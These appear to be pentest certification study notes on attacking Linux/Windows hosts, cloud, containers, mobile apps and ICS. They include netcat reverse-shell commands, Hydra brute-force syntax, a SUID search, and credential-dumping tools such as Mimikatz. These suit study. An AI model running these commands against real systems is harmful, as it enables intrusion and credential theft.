Chapter 10: Attacking Hosts, Cloud Technologies, and Specialized Systems

Question 1

SUID/SGID

Answer 1

Set User ID / Set Group ID

Tells Linux OS that the executable files they’re set for should be run as the owner of the file, not the user who launched it

find / -perm -4000 (root find command that shows all SUID files and folders)

Linux executables that can be used for privilege escalation if SUID permissions are set:
* cp
* find
* Bash shell
* more
* less
* VIM
* Nano
* nmap

Question 2

Unsecure SUDO

Answer 2

All users who can use sudo on Linux are listed in the sudoers file

Always check the file after gaining acces to identify new targets and what rights they have

Question 3

Shell Upgrade Attacks

Answer 3

Restricted shells limit commands or apps that can be used as well as restrict users from:
* Changing directory
* Set PATH or SHELL variables
* Specifcy absolute paths
* Redirect output
* ETC

Breaking out of restricted shells can be done by starting a new unrestricted shell or using VIM that has a built in shell function

In general, when faced with a restricted shell, do the following:
* Check the commands you can run, particularly looking for SUID commands
* Check if you can use sudo and what sudo commands you can execute
* Check for Perl, Python, Ruby, etc that you can run
* Check if you can use redirect operators like pipes and carrots and escape characters like single / double quote, etc

Question 4

Linux Kernel Exploits

Answer 4

Often requires local access to the system

Most kernel patches require a system reboot, and admins may delay kernel updates as a result

Presents an oppty for attackers to gain access since they might not be patched due to a lower perceived risk

To check if you can use Linux for potential kernel exploits:
* lsb_release -a (checks OS release)
* uname -a (checks kernel version)

Question 5

Acquiring and Using Hashes

Answer 5

Windows uses NTLM password hashes for authentcation purposes, and tools like Mimikatz can easily obtain them

NTLM hashes are unsalted

Pass the hash attack is harvesting the NTLM hash and then injecting it into LSASS, SMB, or WMI it as the password since Windows doesn’t verify the actual contents of the password, just the hash

Sysinternals tool psexec can directly accept NTLM hashes as an argument instead of a password

Question 6

LSA Secrets

Answer 6

Registry location:
* HKEY_LOCAL _MACHINE/Security/Policy/Secrets

Contains the encrypted password of logged in user, but the key is stored in the parent Policy key in the Registry

If you gain admin access to the Registry you can get both

Question 7

SAM Database

Answer 7

Windows Security Accounts Manager

One of the first places that you want to target when you gain access to a Windows system

Contains password hashes that can be dumped with Mimikatz or Metasploit using Mimikatz functionality

Question 8

Windows Kernel Exploits

Answer 8

Metsaploit module to list any missing patches:
* post/windows/gather/enum_patches

Reference that list against vulnerability databases to determine if an exploit exists for the unpatched issue

Metasploit has other exploit modules for many of the Windows kernel exploits discovered over, allowing you to assess flaws and attempt exploits once you access the system

Question 9

Unsecure File and Folder Permissions

Answer 9

Linux:
* ls and grep the output for specific persmissions

Windows:
* AccessEnum (sysinternals)
* Accesschck (sysinternals)
* Get-Acl (ps1)
* icacls

Question 10

Credential Acquisition

Answer 10

Windows:
* Mimikatz (standalone)
* Mimikatz (Metasploit meterpreter function)

Linux:
* creddump package on Kali
* cachedump (dumps cached creds)
* lsadump (dumps LSA secrets)
* pwdump (dumps password hashes)

Question 11

Offline Password Cracking

Answer 11

Hashcat
* Uses GPU to crack passwords at high rate of speed
* Much faster than tools like John, which are CPU bound

RainbowCrack
* Rainbow tables for Linux and Windows
* Pre-computed tables that allow you to search for a password hash versus the password itself

John the Ripper
* Autodetects common hashes while providing support for Linux and Windows password hashes
* Custom dictionaries and other word lists

Cain and Abel
* Outdated password recovery tool for Windows NT, 2000, and XP

Question 12

Credential Testing and Brute Force Tools

Answer 12

Hydra
* thc-hydra
* Brute force dictionary attack tool that works against many protocols and services
* SSH, http(s), SMB, databases
* hydra -l [userid] -p [wordlist] [target ip] -t [timing] [protocol]

Medusa
* Similar to Hydra, and if Hydra works for you likely won’t need Medusa

Patator
* Less script kiddie friendly and difficult to use
* Variety of features that might be useful though

Question 13

Directories and Filename Brute Force

Answer 13

W3AF
* Web App Attack and Audit Framework
* Open source web app security scanner that includes directory and filename brute forcing

DirBuster
* Dated but still useful Java app that brute forces directories and filenames on web servers
* Hasn’t been updated since 2013

Question 13

Wordlists and Dictionaries

Answer 13

CeWL
* Custom Word List Generator
* Ruby app that allows you to spider a website based on a URL and depth setting, then generate a wordlist from the files and web pages it finds
* Running against target org can help genreate a customer wordlist
* Add words manually based on OSINT

Question 14

Proxychains

Answer 14

Use to tunnel any traffic through a proxy server with full support for HTTP, SOCKS4, and SOCKS5 proxy servers

Can chain multiple proxies together to further conceal actions

proxychains [application command]

By default it uses TOR, but you can configure it to use others vai /etc/proxychains.conf

Question 14

Remote Access

Answer 14

SSH
* Aside from the Linux SSH service, useful for port forwarding while pivoting
* Can forward traffic through SSH tunnels and hide attack traffic from defenders
* Check what exists in a users ./ssh directory for potential keys
* EX (port forward): ssh -R[port A]:[host1]:[port B] [user]:[host2]

NETCAT and Ncat
* Reverse shell
* nc [IP of remote system] [port] -e /bin/sh
* Windows reverse shell
* nc [IP of remote system] [port] -e cmd.exe
* Listener
* nc -l -p [port] -e /bin/sh

Question 15

Virtual Machine Attacks

Answer 15

Check for VM
* (Windows) wmic baseboard get manufacturer, product
* (Linux) system-detect-virt — demidecode —ls -l /dev/disk/by-id

Once you know what hypervisor you’re dealing with you can conduct research on the attack methods that may be best for the environment

DION NOTES
VM Escape
Occurs when an attacker attempts to get out of an isolated VM and directly sends commands to the underlying hypervisor
* Because each VM is supposed to be isolated, VM escape is difficult to accomplish
* To be effective, attacker has to interface with the underlying physical resources (memory, HD, processing)
* Exploit is usually within the hypervisor’s code itself
* Easier to perform on Type 2 hypervisor than Type 1
* VM to hypervisor or host OS

VM Hopping
Occurs when an attacker attempts to move from one VM to another on the same host
* Focuses on exploiting the hypervisor on the virtualization software or some kind of feature to move between the two isolated VMs
* Unlike escape, hopping is VM to VM

Sandbox Escape
Occurs when an attacker circumvents sandbox protections to gain access to the protected OS or other privileged processes

Other VM Concerns
Live Migration
* Migrating a VM from one host to another, even while it’s running
* If the live migration happens over an unencrypted connection, there’s a possibility that the data contained in the VM is exposed or the integrity compromised by on-path attack
* Encrypt VM images before sending

Data Remnants
* Leftover pieces of data that may exist in the HD which are no longer needed
* Always encrypt VM storage locations and ensure the encryption key is destroyed when the VM is no longer needed

VM Sprawl
* Creating VMs without proper change control procedures
* Attackers can gain access to one that’s been spun up and forgotten, and then use it to pivot

VM Repositories
* A place where all VM images and templates are being stored
* If you can embed malware or a backdoor in one of the templates, any time a new VM is generated it’s infected

Question 16

Container Attacks

Answer 16

Containerized Workload Vulnerabilities
* Focus on the apps running in containers themselves
* Pentesters can leverage existing app or service vulnerabilities to exploit APIs
* Use exploited APIs to go further attack like installing tools into the containerized environment

Misconfigured Containerized Technologies
* Look for exposed API services, dashboards, open proxies, and configuration information
* Improperly secured management tools, improperly set permissions, or access to secrets is desirable as well

DION NOTES
If an attacker compromises the host OS underneath the containers, they now have access to all of the containers and their data
* Hosting all VMs on the same type of hypervisor can also be exploited

Vulnerabilities of Container Hosting
1. When an org crashes a physical server, all of the org’s hosted on that same server are impacted
2. An org failing to secure its virtual environments hosted on a shared server poses a security risk for the other orgs hosting on the same server

Question 17

Attacking and Using Misconfigured Cloud Assets

Answer 17

IAM
* Commonly misconfigured due to improper or weak settings
* Can be as simple as not enforcing best practices for credentials and passwords
* Often more specific to the service or system they’re set up to protect
* EX: Putting the wrong security group or policy on a cloud asset

Object Storage
* Amazon S3 for example
* When you assess an object store you’re looking for publicly accessible storage, open upload access, directory listing rights, or open download access
* AWS CLI to check what a S3 bucket alows
* aws s3 ls s3://examplebucket -recursive -human-readable

Federation Misconfigurations
* Commonly used between on-site AD environments and Azure’s AD for MS tools like Exchange
* Local ADFS server connects to Azure allowing authentication and authorization between environments
* Attacks that focus on signing certs and tokens can be conducted, and misconfigs can be used in both local and cloud (similar to Kerberos attacks)

DION NOTES
Misconfigured Cloud Assets
Account, storage, container, or other cloud-based resource that’s vulnerable to attack because of its current configuration

Cloud Federation
The combination of infrastructure, platform services, and software to create data and applications that are hosted by the cloud

IAM
Defines how users and devices are represented in the org and their associated permissions to resources within the org’s cloud federation, including types like:
* Personnel: Defines identities for an org’s employees
* Endpoints: For resources and devices used by personnal to gain legitimate access to the network
* Server: Mission critical systems that provide a service to other users and endpoints
* Software: Uniquely identifies a software’s provenance prior to installation
* Roles: Supports the identities of various assets and associated permissions and rights to the roles or functions of those resources

These are not always tied to a user—sometimes related to software and hardware, and those things need to be given certain rights and permissions
* Attackers will look for misconfigurations on all levels of the IAM system so they can gain more permissions and escalate or laterally move

Object Storage
Cloud data is stored in buckets (AWS) or blobs (Azure)
* Each container is created in a specific region or availability zone within that cloud service provider
* All objects are then placed into the buckets or blobs
* Container is like a folder, object is like a file
* Permissions are set with object ACLs, container policies, and access management authorizations

Exploit Possibilities
* By default, storage containers set themselves to read-write which can make any data uploaded freely accessible, which can lead to unauthorized access or the hosting of malicious files
* Containers are often used to host static files like video, image, audio, and webpages—if they misconfigure their CORS policy with the CDN, an attacker can exploit with XSS
* CORS allows objects to be read from multiple domain names and displayed properly in a browser—by default the accepted domains are the asterisk wildcard (misconfig is in OWASP 10 broken access control)

Question 18

Cloud Malware Injection Attacks

Answer 18

On-path attacks that redirect users to attackers instances of cloud services

Traditionally was accomplished using XSS, but injecting malicious code into service or code pipelines or adding malicious tools into existing cloud infrastructure can also work

DION NOTES
Attempts to add an infected service implementation module to the cloud service, and can be done with SQL injection, XML injection, XSS attack, etc
* The attacker is attempting to insert malicious code into a service or server, and then have it execute that malicious code when the end user makes a request to that cloud service

Question 19

Resource Exhaustion and DoS

Answer 19

Even though cloud tech can scale under load, they can still be exhausted and overloaded

Pentesters are less likely to be able to achieve this though

DION NOTES
A DoS is used to attack any protocol, device, OS, or service in an attempt to disrupt the services it provides to its users
* Usually caused by resource exhaustion
* Attacker exploits a system in order to consume all the CPU, memory, disk space, or allowed client connections
* If all resources are exhaused, the system could have a failure or fully crash

Resource Exhaustion Techniques
Amplification or Volumetric Attacks
Used to saturate the bandwidth of a given network resource
* EX: If an org is using a 10mbps elastic file system connection, an attacker can overwhelm this connection by continually requesting large files from that elastic file system resource—as the connection is saturated, it slows down or even stops

Fragmentation of Requests
Sending multiple fragmented TCP requests to a server
* Since the requests are fragmented, the server has to manage these fragmented pieces until it can match up the requests fully
* Similar to a puzzle, the server can’t see the big picture yet and answer the request until all pieces are reassembled
* As it holds the pieces, it must allocate resources to that
* If the resources aren’t freed up, could create DoS via resource exhaustion

Other DoS Attacks on Cloud
* Packet flood
* SYN flood
* HTTP flood
* DNS flood
* DNS amplification
* NTP amplification

Question 20

Direct to Origin (D2O) Attacks

Answer 20

Form of DDoS that works to bypass CDNs or other load distribution and proxying tools

Aims to attack underlying infrastructure and intended to negate protections and capacity provided by CDNs

Less likely for pentesters to conduct due to complexity and expense associated with it

DION NOTES
Attempts to bypass reverse proxies to directly attack the original network or IP address of the cloud-based server
* If an attacker can identify the IP address of the origin server or network, they can attack that origin directly

How It Works
* The attacker starts by launching their attack through the normal reverse proxy
* The reverse proxy should block the attack
* But during the attempt, the attacker can attempt to disclose the origin IP or network address of the origin server
* If they can get that information, the attack can then be launched directly against that origin and completely bypass the reverse proxy or other DDoS protection

Question 21

Side Channel Attacks

Answer 21

Where attackers try to use shared resources or compromise of the virtualization or containerization system to gain access to data without compromising the target system itself

DION NOTES
Aims to measure or exploit the indirect effects of a system instead of targeting the code or program directly
* For cloud targets, the most common side channel attack attempts to exploit the shared nature of the cloud infrastructure
* The goal would be to gain access to sensitive information that’s leaking out of the infrastructure like cryptographic keys that are used by the cloud-based servers
* These attacks often attempted to compromise IaaS architecture by placing a VM on the same physical server as their targeted VM
* Then, the attacker attempts to extract useful information from the VM using a covert channel by identifying sensitive details from that targeted VM

To Prevent
* Encrypt all cloud data
* Use strong MFA checks
* Verify all cloud service configs through routine monitoring and auditing

Page 383 picture

Question 22

Tools for Cloud Technology Attacks

Answer 22

ScoutSuite
Open source multicloud auditing tool written in Python that can be used to audit instances and policies created on multicloud platforms by collecting data using API calls
* You can run SS without having to notify cloud providers about pentesting or scanning activities
* Allows you to write custom rules sets as well that you can use during scans to highlight or flag things when a policy violation exists, like no MFA being used

After it run, it compiles a report that lists out:
* VM instances
* Storage containers
* IAM accounts
* Data and firewall ACLS

Prowler
Open-source secrity tool used for security best practices assessments, audits, IR, continuous monitoring, hardening, and forensics readiness for AWS cloud services
* Able to check for compliance against over 200 different controls
* CLI tool that can create a report in HTML, CSV, and JSON
* Can use checks and rules, or create your own
* Useful for checking multiple AWS accounts in parallel

CloudBrute
Used to find a target’s infrastructure, files, and apps across the top CSP including Amazin, MS, Google, DigitalOcean, Alibab, Vultr, and Linode
* Works like a web crawler or brute force directory tool like DirBuster
* Runs without credentials and will try common brute force techniques to help enumerate
* Focuses on object storage, VMs, containers, etc

Pacu
Exploitation framework used to assess the security configuration of an AWS account
* Performs testing for privilege escalation, disrupts monitoring efforts, implants backdoors via IAM user account modification and security groups
* Focuses on the post-compromise phase
* Thnk of it like Metasploit but specifically for AWS cloud infrastructure

Cloud Custodian
Cloud security, governance, and management tool designed to help admins create policies based on different resource types
* Not intended as a pentest tool
* Helps users secure their cloud environment
* But reports it provides can help pentesters identify new oppty

Question 23

Mobile Pentest Tools

Answer 23

Burp Suite
* Web interception proxy that allows for the interception, inspection, and modification of raw traffic passing through
* Web app vulnerability scannerning and pentesting toolkit
* Less likely for mobile, but can be used for web-based mobile apps

MobSF
* Mobile Security Framework
* Automated, all in one mobile app pentesting, malware analysis, and security assessment framework capable of performing dynamic and static code analysis
* Automated Android, iOS, and Windows framework
* Can perform static and dynamic code analysis and supports many app binaries

Postman
* API platform for building and using APIs that simplifies each step of the API lifecycle and streamlines collaboration
* API testing tool that can do stress testing, API functionality testing, and other API validation tasks
* Can automate testing based on API calls

Ettercap
* Suite for MITM against mobile apps
* Can be used against any network connected host or device, not just mobile

Frida
* Open-source tool that provides custom developer tools for pentesters when conducting application pentesting on mobile apps
* Injection tool that can be used to inject JS code or other libraries into native Android or iOS apps, as well as other OS like Windows and macOS
* Can intercept and modify JS responses in apps to bypass input requirements or even authentcation processes

Objection
* Runtime mobile exploration toolkit that’s built to help assess the security posture of mobile apps, without requiring the device to be jailbroken
* Powered by Frida and used to access mobile apps
* Places runtime objects into running process via Frida and let’s you execute code inside whatever sandbox or environment the mobile device or system has the code running in

Needle
* Open-source, modular framework that’s used to streamline the security assessment process on iOS apps
* Decommissioned in favor of Frida

Android SDK (APK SDK)
* A large set of tools, libraries, documentation, code samples, processes, and guides created specifically for Android OS
* Build Android apps

Drozer
* Android security assessment framework
* A complete security audit and attack framework that provides the tools to use and share public exploits for the Android OS
* Think of it like Metasploit framework

APKX
* Android APK Decompiler
* A tool that can extract an APK file, an Android binary, or application back to its Java source code
* Wrapper for various Java decompilers and DEX converters
* Allows you to extract Java source code from Android packages
* DEX –> JAR –> Java

APK Studio
* Cross-platform integrated development environment (IDE) used for writing the source code to make job applications for the Android OS
* Decompiler, compiler, and debugger built into it
* Integrated development environment designed to reverse engineer Android apps

Question 24

Cloud Credential Harvesting

Answer 24

Credential harvesting is any attack designed to steal usernames and passwords

The most common form of cloud credential harvesting is going to occur against an org’s cloud-based email services, usually via phishing or social engineering attack
* They direct users to fake login portals and take their credentials
* You’ve seen this every day on the job

Account Takeover
The goal after credential harvesting, where attackers silently embed themselves within an org to slowly gain additional access or infiltrate new orgs
* APT are adept at this
* They can perform a BEC
* Hard to detect

Attackers can attempt to take over your cloud service provider account as well
* If they can takeover the account of domain rep or cloud admin, they can create additional cloud servers and services which are all billed to your org
* With this, your org and data aren’t the targets—instead, it’s your authorized cloud services account and the org’s high credit limit
* Allows attacker to spin up new virtual servers that can be configured to do heavy compute loads for their benefit

Question 25

Metadata Service

Answer 25

Used to provide data about an org’s instances so that they can configure or manage their running instances, which is then divided into:
* Hostnames
* Events
* Security groups

The metadata service is used in AWS to provide data about the instances being run in an org’s AWS cloud account
* There have been some major breaches tied back to attacks against the metadata service as the initial attack vector

How It Can be Exploited
SSRF, which is an attack that takes advantage of the trust relationship between the server and the other resources it can access
* Exploit vulnerable applications
* Communicate with the Metadata Service
* Extract credentials
* Pivot into cloud account

EXAM NOTES
* Just know that a metadata service attack is a form of SSRF that focuses on taking metadata about the instances
* Then, it uses that to get the value of the instances or containers and their associated credentials and keys

Question 26

SDKs in Cloud

Answer 26

SDKs can contain vulnerabilities if the original author didn’t build it securely

You accept all existing vulnerabilities in an SDK into your own code as you build off it

In cloud computing, devs rely on SDKs to connect to various resources:
* EX: AWS SDK can simplify coding by providing JavaScript objects to access different AWS services
* This allows devs to access AWS directly fro their JS code which can be run from their web browser

As An Attacker
* Stay up to date with the latest vulnerabilities that are being discovered and released in the different SDKs
* There’s always a delay from when a new vuln is released and when the org devs actually update the code

Question 27

ICS Protocols

Answer 27

CAN
Controller Area Network
* Designed to allow communiations between embedded programmable logic controllers (PLC)
* Most notably used within vehicles to interconnect the different systems
* Operates like ethernet—anyone connected is trusted because they’re located at the source
* Outside world can connect, which makes these networks part of the IoT
* CAN does not have source addressing or message authentication

How to Exploit
Attackers must gain access to the CAN bus via:
* OBD-II port connection to inject messages locally—connect device that receives cellular messages
* The on-board cellular modem in your vehicle—cars will often have two networks, one for entertainment and one for CAN bus, that are logically and physically separated
* The on-board Wi-Fi network—connect to the car’s network and then send messages to exploit CAN bus

Modbus
Gives control servers and the SCADA host the ability to query and change configurations of each PLC over a network
* Originally called Modbus RTU and was run over fieldbus networks
* Modbus looks and functions differently than TCP/IP does
* Requires a completely different way of dealing with it than anything network or TCP based
* Standard IR tools on an ICS/SCADA network will break stuff because Modbus is different

DDS
Data Distribution Service
* Provides network interoperability and facilitates the required scalability, performance, and QoS features required my modern apps in ICS and SCADA networks

SIS
Safety Instrumented System
* Returns and industrial process to a safe state after a predetermined condition was detected
* Detects dangerous conditions to reduce the severity of an emergency by taking quick action
* Think horns, lights, etc

Question 28

Data Storage Systems and Vulnerabilities

Answer 28

Direct Attach Storage
Any kind of storage that is attached to a system itself
* HD in server or workstation

The difference between NAS and SAN is how data is read and written to the device
Network Attach Storage
Any group of file servers that are attached to the network dedicated to provisioning data access
* Connecting to the device over the network and it has its own file system

Storage Area Networks
A separate subnetwork that consists of storage devices and servers that are used to house a large amount of information
* Network based connection that you read and write data to a storage array based directly on block storage capabilities without the need for underlying OS

Vulnerabilities
Misconfigurations
The most common way an attacker can exploit a data storage system
* Usually improper access writes or permissions to data being stored—if permissions are too loose, attackers can access and exfiltrate
* Default or blank usernames and passwords
* Network exposure where data is accessible to anyone on the local network when it shouldn’t be

Underlying Software Vulnerabilities
* NAS array has its own OS being used to give access to data on the system
* If the OS, usually Linux, has vulns it can provide unauthorized root
* Can get access to all information stored

Improper Error Messages and Debug Handling
* If the data storage system gives you error messages, you can use them to learn more
* Detailed error messages leak data that can help you attack

Injection Vulnerabilities
* SQL, DLL, command injection to put data into a storage system that shouldn’t be there

Lack of User Input Sanitization
* Goes hand in hand with injection
* If the system doesn’t sanitize or parameterize queries, you’re in trouble

Management Interface Vulnerabilities
IPMI = Intelligent Platform Management Interfaces
* A system that allows admins to easily monitor and control all their servers from a centrally located interface
* If not configured properly, you can access and expose all network data
* Huge target that will allow you to hit anything on the network if you can get in

Question 29

VDI Models

Answer 29

Centralized Model
Hosts all the desktop instances on a single server or server farm

Hosted Model
AKA Desktop as a Service (DaaS), which is maintained by a service provider and provided to the end user as a service
* Amazon Workspace
* VMware Horizon Air
* Citrix Zen Desktop

Remote Virtual Desktop Model
Copies the desktop image to a local machine prior to being used by the end user

Terminal Services
A server-based solution that runs an application on servers in a centralized location

Application Streaming
A client-based solution that allows an application to be packaged up and streamed directly to a user’s PC
* MS AppV